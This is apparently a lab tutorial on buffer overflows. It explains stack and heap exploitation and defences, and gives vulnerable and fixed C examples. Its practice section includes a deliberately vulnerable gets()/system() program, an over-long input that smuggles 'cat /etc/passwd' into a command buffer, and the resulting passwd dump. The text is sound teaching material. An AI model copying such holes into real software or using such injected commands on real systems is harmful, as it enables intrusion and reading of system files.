Buffer overflows can cause a process to crash or produce wrong results. They can be triggered by specially crafted input designed to execute malicious code or to make the program behave unexpectedly. In this way buffer overflows are the cause of many security vulnerabilities in software and the basis of many exploits. Adequate bounds checking by the programmer or the compiler can prevent buffer overflows.

Technical description

A buffer overflow occurs when data is written to a buffer and, because of insufficient bounds checking, overwrites the adjacent memory region and corrupts the data values at the memory addresses next to that buffer.
This happens most often when copying a string from one buffer into another.

Basic example

In the following example, a program defines two data items that are adjacent in memory: A is an 8-byte string buffer, and B is a 2-byte integer. Initially A contains only zero bytes and B contains the value 3. Characters are one byte each. Now the program writes the string "excessive" into buffer A, followed by a zero byte marking the end of the string. Because the string length is not checked, the new string overwrites the value of B:

Although the programmer did not intend to modify B, B's value has been replaced by a number formed from the end of the string. In this example, on a big-endian system using ASCII, the character "e" followed by a zero byte becomes the number 25856. If B were the last data item among the variables defined by the program, writing an even longer string that went past the end of B could cause an error such as a segmentation fault, terminating the process.

Stack buffer overflow

Besides modifying unrelated variables, buffer overflows are often exploited by attackers to make a running program execute arbitrary code that they supply. The techniques by which an attacker takes control of a process depend on the memory region in which the buffer is located. For example, the stack region, where data can be temporarily "pushed" onto the "top" of the stack and later "popped" off to read a variable's value. Normally, when a function starts executing, its temporary data items (local variables) are pushed, and the program can access this data for as long as the function runs. Besides stack overflows there are also heap overflows.

In the following example, "X" is data that happens to lie on the stack when the program starts; then the program calls function "Y", which needs a small amount of memory of its own; then "Y" calls function "Z", which needs a large buffer:

If function "Z" overflows its buffer, it can overwrite data belonging to function Y or to the main program:

This is especially serious on most systems. Besides ordinary data, the stack also holds the return address, i.e. the location in the program that was executing before the current function was called.
When the function finishes, its temporary memory is removed from the stack and execution is handed back to the return address. So if the return address is overwritten by a buffer overflow, it will point somewhere else. In the case of an unintentional overflow like the first example, that location is almost certainly invalid, contains no program instruction, and the process crashes. However, an attacker can adjust the return address to point to a location of their choosing so as to compromise the security of the system.

Example source code

The C source below shows a common programming error. Once compiled, the program produces a buffer overflow if it is called with a command-line argument that is a long string, because that argument is used to write into a buffer without checking its length.

************
/* overflow.c - demonstrates a buffer overflow */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);
    return 0;
}
************

Strings of no more than 9 characters do not overflow the buffer. Strings of 10 or more characters do overflow it: this is always a bug, but it does not always make the program misbehave or cause a segmentation fault.

The program above can be rewritten safely using the strncpy function as follows:

************
/* better.c - demonstrates one method of fixing the problem */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strncpy(buffer, argv[1], sizeof(buffer));
    buffer[sizeof(buffer) - 1] = 0;
    return 0;
}
************

Exploitation

There are different techniques for exploiting buffer overflows, depending on the computer architecture, the operating system and the memory region.
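The basic example above states that "excessive" written into the 8-byte buffer A turns the 2-byte big-endian integer B from 3 into 25856, and overflow.c/better.c show the unbounded and the bounded copy. The Python below is an added example, not from the lab book: Python itself has no unchecked copies, so it models the two adjacent variables as a bytearray and implements the copy rules of strcpy (every byte plus the terminator, no bounds check) and of the strncpy-plus-forced-terminator pattern used in better.c, so the 25856 and the truncation can be observed directly. The layout (A then B, big-endian) follows the text; the `MemoryError` used to stand in for a write past the modelled memory is this example's convention.

```python
"""Model of the Lesson 14 'excessive' example and of overflow.c vs better.c.

Added example, not from the lab book. Memory is a bytearray holding the
8-byte buffer A followed by the 2-byte big-endian integer B, as in the text.
"""
import struct

A_SIZE = 8   # char A[8]
B_SIZE = 2   # 2-byte integer B, big-endian as in the text


def fresh_memory(b_value=3):
    """A is all zero bytes, B holds b_value: the initial state in the text."""
    return bytearray(A_SIZE) + bytearray(struct.pack(">H", b_value))


def read_b(mem):
    """Read B from the bytes immediately after A."""
    return struct.unpack(">H", bytes(mem[A_SIZE:A_SIZE + B_SIZE]))[0]


def strcpy_like(mem, offset, text):
    """strcpy rule: write every byte of text plus the NUL, with no bounds check."""
    data = text.encode("ascii") + b"\x00"
    if offset + len(data) > len(mem):
        # Past the end of everything the program defined: the segfault case in the text.
        raise MemoryError("write past the end of the modelled memory")
    mem[offset:offset + len(data)] = data
    return mem


def strncpy_like(mem, offset, text, size):
    """better.c pattern: copy at most size bytes, then force a terminator at size-1."""
    data = text.encode("ascii")[:size].ljust(size, b"\x00")   # strncpy pads with NUL
    mem[offset:offset + size] = data
    mem[offset + size - 1] = 0                                 # buffer[sizeof(buffer)-1] = 0
    return mem


def c_string(mem, offset):
    """Read a NUL-terminated string starting at offset, as C would."""
    end = mem.index(0, offset)
    return mem[offset:end].decode("ascii")


if __name__ == "__main__":
    m = strcpy_like(fresh_memory(), 0, "excessive")
    print("after strcpy:  A =", c_string(m, 0), " B =", read_b(m))      # B = 25856
    m = strncpy_like(fresh_memory(), 0, "excessive", A_SIZE)
    print("after strncpy: A =", c_string(m, 0), " B =", read_b(m))      # B = 3
```

The 'e' (0x65) and the terminator (0x00) land in B's two bytes, and 0x6500 read big-endian is 25856; the bounded copy keeps B at 3 at the cost of silently truncating A to "excessi", which is why better.c's forced terminator matters: without it strncpy would leave A unterminated.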
For example, exploiting the heap (used for dynamically allocated variables) is very different from exploiting variables on the stack.

Exploiting stack buffer overflows

A technically skilled and malicious user can exploit stack buffer overflows to manipulate a program in one of the following ways:

- Overwrite a local variable near the buffer on the stack to change the program's behaviour in the attacker's favour.
- Overwrite the return address in a stack frame. When the function returns, execution continues at the address the attacker specified, usually a buffer containing user input.
- If the address of the user-supplied data is not known but is known to be held in a register, the return address can be overwritten with the address of an opcode whose effect is to make execution jump to the user data. Specifically, if the address of the malicious code to be run is held in a register R, then jumping to the location holding the opcode for a jump R, call R (or a similar instruction with the effect of jumping to the address in R) causes the code in the user data to execute. The addresses of suitable opcodes or bytes can be found in memory in the dynamic link libraries (DLLs) or in the executable itself. However, the opcode address usually must not contain any null character (zero byte), and these addresses may differ between applications and between versions of the operating system. The Metasploit project is one of the databases of suitable opcodes, although it only lists opcodes for Microsoft Windows.

Exploiting heap buffer overflows

A buffer overflow in the heap data area is called a heap overflow and can be exploited with techniques different from those for stack overflows. Heap memory is allocated dynamically by applications at run time and usually holds program data. Exploitation is carried out by corrupting this data in specific ways so that the application overwrites internal data structures such as linked-list pointers. The Microsoft JPG GDI+ vulnerability is a recent example of the danger a heap overflow can pose.

Barriers to exploitation

Manipulating the buffer before it is read or executed can defeat attempts to exploit a buffer overflow.
Such manipulation can reduce the threat of exploitation, but cannot necessarily prevent it absolutely. The manipulation can include converting upper case to lower case, removing metacharacters, and filtering out strings that contain anything other than letters and digits. However, there are techniques to evade this filtering and manipulation: alphanumeric code, polymorphic code, self-modifying code and return-to-libc attacks. The same methods can also be used to evade detection by intrusion detection systems.

Protection against buffer overflows

Many diverse techniques, each with its advantages and drawbacks, have been used to detect or prevent buffer overflows. The most reliable way to avoid or prevent buffer overflows is to use automatic protection at the programming-language level. However, this kind of protection cannot be applied to legacy code, and technical, business or cultural constraints often require an unsafe language. The following sections describe the available choices and implementations.

Choice of programming language

The choice of programming language can have a profound effect on the occurrence of buffer overflows. As of 2006, C and C++ are among the most popular programming languages, with an enormous body of software written in them. C and C++ provide no built-in protection against accessing or overwriting data in any part of memory through invalid pointers; in particular, they do not check that data written to an array (the implementation of a buffer) stays within the bounds of that array. Note, however, that the C++ standard library, the Standard Template Library (STL), provides many safe ways to store data in buffers, and C programmers can create and use similar utilities. As with any other feature of C or C++, each programmer must decide for themselves whether to accept the cost in program speed in exchange for the potential benefit (program safety).

Some variants of C, such as Cyclone, help prevent buffer overflows further by, for example, attaching size information to arrays.
The D programming language uses a variety of techniques to avoid most uses of pointers and user-defined bounds checking.

Many other programming languages provide run-time checking that issues a warning or raises an exception where C or C++ would overwrite data. Examples of such languages range from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Nearly all interpreted languages protect against buffer overflows by signalling a well-defined error. Usually, where a language provides enough type information to perform bounds checking, it also allows that mode to be enabled or disabled. Static analysis can remove many dynamic type and bounds checks, but poor implementations and awkward cases can reduce performance significantly. Software engineers must carefully weigh the trade-off between safety and performance when deciding which language to use and how to configure the compiler.

Use of safe libraries

Buffer overflows are common in C and C++ because these languages expose the low-level representation details of buffers as containers for data types. Buffer overflows must therefore be avoided by maintaining a high degree of correctness in the code that performs buffer management. Using well-written and tested libraries for abstract data types that perform automatic memory management, including bounds checking, can reduce the occurrence and impact of buffer overflows. In these languages, strings and arrays are the two main data types at which buffer overflows commonly occur; libraries that prevent buffer overflows in these data types can therefore provide the bulk of the necessary coverage. Still, incorrect use of safe libraries can lead to buffer overflows and other vulnerabilities, and of course any bug in the library itself is a vulnerability. "Safe" library implementations include The Better String Library, Arri Buffer API and Vstr. The C library of the OpenBSD operating system provides the helpful strlcpy and strlcat functions, but these are far more limited than full safe-library implementations.

In September 2006, Technical Report 24731 of the C standards committee was published; it describes a set of new functions, based on the standard C library's I/O and string-handling functions, which are augmented with buffer-size parameters.

Stack-smashing protection

Stack-smashing protection is the technique used to detect the most common buffer overflows. It checks whether the stack has been modified when a function returns. If the stack has been altered, the program terminates with a segmentation fault. Systems that use this technique include Libsafe, StackGuard and the ProPolice patches.

Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH exception handler from being overwritten.

The stack can be protected further by splitting it into two parts, one for data and one for function returns. This split is used in the Forth programming language, although it was not a design decision based on safety criteria. It is in any case not a complete solution to the buffer overflow problem, since sensitive data other than the return address can still be overwritten.

Executable space protection

Executable space protection is one approach to preventing buffer overflows. This technique prevents the execution of code on the stack or heap. An attacker can use a buffer overflow to inject arbitrary code into a program's memory, but with executable space protection, any attempt to run that code raises an exception.

Some CPUs support a feature called the NX ("No eXecute") bit or the XD ("eXecute Disabled") bit. Combined with software, these features can be used to mark data pages (such as those holding the stack and heap) as readable but not executable.

Some Unix operating systems (such as OpenBSD and Mac OS X) ship with executable space protection. Optional software packages include:
PaX
Exec Shield
Openwall

Recent variants of Microsoft Windows also support executable space protection, under the name Data Execution Prevention.
Add-on software includes:
SecureStack
OverflowGuard
BufferShield
StackDefender

Executable space protection does not protect against return-to-libc attacks.

Address space layout randomization

Address space layout randomization (ASLR) is a computer security feature that arranges the positions of key data areas (usually including the base of the executable and the positions of libraries, heap and stack) randomly within a process's address space.

Randomizing the virtual memory addresses at which functions and variables reside makes exploiting a buffer overflow more difficult, but not impossible. It also forces the attacker to tailor the exploit to each specific system, which defeats the efforts of Internet worms. A similar but less effective method is rebasing processes and libraries in the virtual address space.

Deep packet inspection

Deep packet inspection (DPI) can detect remote attempts to exploit buffer overflows right at the network perimeter. These techniques can block packets that carry the signature of a known attack or that contain a long series of No-Operation (NOP) instructions; such sequences are commonly used when the location of the attack's payload is slightly variable.

Packet scanning is not an effective method, since it can only stop known attacks, and there are many ways to encode a NOP instruction. Attackers can use alphanumeric, metamorphic and self-modifying shellcode to evade detection by packet scanning.

II/ Practice:

Boot Linux from the CD, then write a piece of code with the following content:
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *name;
    char *dangerous_system_command;

    name = (char *) malloc(10);                        /* 10-byte heap buffer for the name */
    dangerous_system_command = (char *) malloc(128);   /* neighbouring heap buffer holding the command */
    printf("Address of name is %ld\n", (long) name);               /* printed in decimal, as in the lab output */
    printf("Address of command is %ld\n", (long) dangerous_system_command);
    sprintf(dangerous_system_command, "echo %s", "Hello world!");
    printf("What's your name?");
    gets(name);   /* deliberately unsafe: gets() has no bound, so input longer than 10 bytes runs into the command buffer */
    system(dangerous_system_command);
    return 0;
}

Save this code as a text file and compile it with gcc:

root@1[Desktop]# gcc buffer.c -o buffer
buffer.c:13:2: warning: no newline at end of file
/tmp/ccefevDP.o(.text+0x82): In function `main':
: warning: the `gets' function is dangerous and should not be used.
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?hao
Hello world!
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?1234567890123456cat /etc/passwd
root:x:0:0:root:/home/knoppix:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
majordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
msql:x:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh
mysql:x:100:103:MySQL Server:/var/lib/mysql:/bin/false
postfix:x:102:65534:Postfix Mailsystem:/var/spool/postfix:/bin/false
knoppix:x:1000:1000:Kanotix User:/home/knoppix:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:103:65534:SSH Server:/var/run/sshd:/bin/false
partimag:x:104:65534::/home/partimag:/bin/false
telnetd:x:101:101::/usr/lib/telnetd:/bin/false
distccd:x:105:65534::/:/bin/false
bind:x:106:108::/var/cache/bind:/bin/false
messagebus:x:108:1002::/var/run/dbus:/bin/false
captive:x:109:65534::/var/lib/captive:/bin/false
sslwrap:x:107:1001::/etc/sslwrap:/bin/false
distmp3:x:112:112::/nonexistent:/bin/false
saned:x:114:114::/home/saned:/bin/false
arpwatch:x:110:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
snort:x:111:117:Snort IDS:/var/log/snort:/bin/false
thpot:x:113:65534:Security Officer,,,:/usr/share/thpot:/dev/null
ftp:x:115:65534::/home/ftp:/bin/false
freerad:x:116:118::/etc/freeradius:/bin/false
debian-tor:x:119:119::/var/lib/tor:/bin/bash

We were able to execute the command cat /etc/passwd through the buffer overflow.
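A hardened rewrite of the lab program, added here as an example that is not part of the lab book: the name is read with a bounded line reader instead of gets(), the command is built with snprintf() rather than sprintf(), and the same over-long input the lab typed ("1234567890123456cat /etc/passwd") is fed in to show that the neighbouring command buffer stays intact. The functions read_line_bounded and run_lab_safely are this example's own names, and the keyboard is replaced by a constructed temporary file.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read one line into buf (capacity cap): always NUL-terminate and drain the
 * rest of an over-long line so nothing spills into the neighbouring chunk.
 * Returns the length the line really had; a result >= cap means truncation. */
size_t read_line_bounded(char *buf, size_t cap, FILE *in)
{
    size_t seen = 0;
    int c;
    if (cap == 0) return 0;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (seen + 1 < cap)            /* keep one byte for the terminator */
            buf[seen] = (char)c;
        seen++;
    }
    buf[seen < cap ? seen : cap - 1] = '\0';
    return seen;
}

/* The lab's two heap buffers, but the name is read with read_line_bounded()
 * instead of gets() and the command is built with snprintf(). Copies the name
 * into name_out; returns 1 if the command is intact, 0 if corrupted, -1 on malloc failure. */
int run_lab_safely(FILE *in, char *name_out, size_t name_cap)
{
    char *name = malloc(name_cap);
    char *command = malloc(128);
    if (!name || !command) { free(name); free(command); return -1; }
    snprintf(command, 128, "echo %s", "Hello world!");
    if (read_line_bounded(name, name_cap, in) >= name_cap)
        fprintf(stderr, "name truncated to %zu characters\n", name_cap - 1);
    int intact = strcmp(command, "echo Hello world!") == 0;
    memcpy(name_out, name, name_cap);
    free(name); free(command);   /* the lab calls system(command) here; omitted so there are no side effects */
    return intact;
}

int main(void)
{
    char name[10];
    FILE *in = tmpfile();        /* constructed stand-in for the keyboard */
    if (!in) return 1;
    fputs("1234567890123456cat /etc/passwd\n", in);
    rewind(in);
    int intact = run_lab_safely(in, name, sizeof name);
    printf("name=\"%s\" command intact=%d\n", name, intact);
    return intact == 1 ? 0 : 1;
}
```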